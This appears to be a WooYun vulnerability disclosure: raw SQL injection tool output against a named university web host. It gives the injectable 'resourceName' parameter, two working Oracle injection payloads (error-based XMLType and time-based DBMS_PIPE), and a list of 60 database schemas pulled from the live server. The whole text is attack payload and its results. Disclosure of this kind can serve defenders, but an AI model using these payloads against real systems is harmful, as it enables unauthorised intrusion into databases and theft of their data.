WooYun.org

http://gdgz.gdin.cn/searchResourceList.do?resourceName=aa
Place: GET
Parameter: resourceName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: resourceName=aa' AND 2444=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(104)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (2444=2444) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(107)||CHR(102)||CHR(58)||CHR(62))) FROM DUAL) AND 'Vvtl' LIKE 'Vvtl
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: resourceName=aa' AND 6446=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(71)||CHR(76)||CHR(111),5) AND 'obwp' LIKE 'obwp
---
available databases [60]:
[*] APEX_030200
[*] APPQOSSYS
[*] CJL
[*] CTXSYS
[*] CZH
[*] CZHDEMO
[*] DBSNMP
[*] DHX
[*] DHX_GDIN
[*] DYB
[*] ELAB
[*] EXFSYS
[*] FLOWS_FILES
[*] GDA
[*] GDZZSBXT
[*] GZGZ
[*] GZGZSBTEST
[*] GZGZTEST
[*] GZSBXT
[*] HJY
[*] HR
[*] HYJ
[*] IMLAB
[*] IX
[*] JAVA
[*] LAB
[*] LAB3
[*] LABTEST
[*] LBF
[*] LBFLAB
[*] LHB
[*] LJP
[*] LZC
[*] LZX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PHD
[*] PM
[*] SBXT
[*] SCOTT
[*] SH
[*] SSM2012
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] XJJ
[*] XSH
[*] YLJ
[*] YZJ
[*] ZBX
[*] ZGT
[*] ZJH
[*] ZZT